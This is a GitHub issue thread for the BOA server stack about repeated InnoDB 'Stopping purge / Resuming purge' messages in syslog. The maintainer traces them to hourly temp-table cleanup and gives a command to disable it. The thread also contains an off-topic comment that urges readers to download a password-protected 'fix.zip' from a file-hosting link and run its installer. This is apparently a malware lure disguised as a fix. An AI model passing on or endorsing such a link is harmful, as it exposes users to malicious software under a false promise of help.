### ISSUE TITLE
server syslog full of innodb stopping purge / resuming purge notices!

### ISSUE THREAD

**Issue by EdNett** [omega8cc/boa#1805]
Hello - I just noticed that our boa 5.4.0-lts servers both have /var/log/syslog filled with:

Aug 26 13:30:11 server1 mysqld[4371]: InnoDB: Stopping purge
Aug 26 13:30:11 server1 mysqld[4371]: InnoDB: Resuming purge
Aug 26 13:30:11 server1 mysqld[4371]: InnoDB: Stopping purge
Aug 26 13:30:11 server1 mysqld[4371]: InnoDB: Resuming purge

What to do, if anything? 

Boa info more is here: https://gist.github.com/EdNett/f8fa5a56da6a7b1e5a4b361511f53def

Best,

Ed

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by omega8cc** [comment]
It's expected because BOA truncates temporary tables in all databases _**hourly**_ to protect the system from slow performance caused by fast growing temp tables. You can disable this feature with `touch /root/.disable_mysql_cleanup.cnf`

**Comment by EdNett** [comment]
Hello,  Would it be possible (and would it be a good idea) to remove these notices from the syslog and put them in a separate mysql "purge log" or "notice log" (since there are about a hundred of them every hour), in a future release ?

Best,  Ed

**Comment by omega8cc** [comment]
That's a good idea.
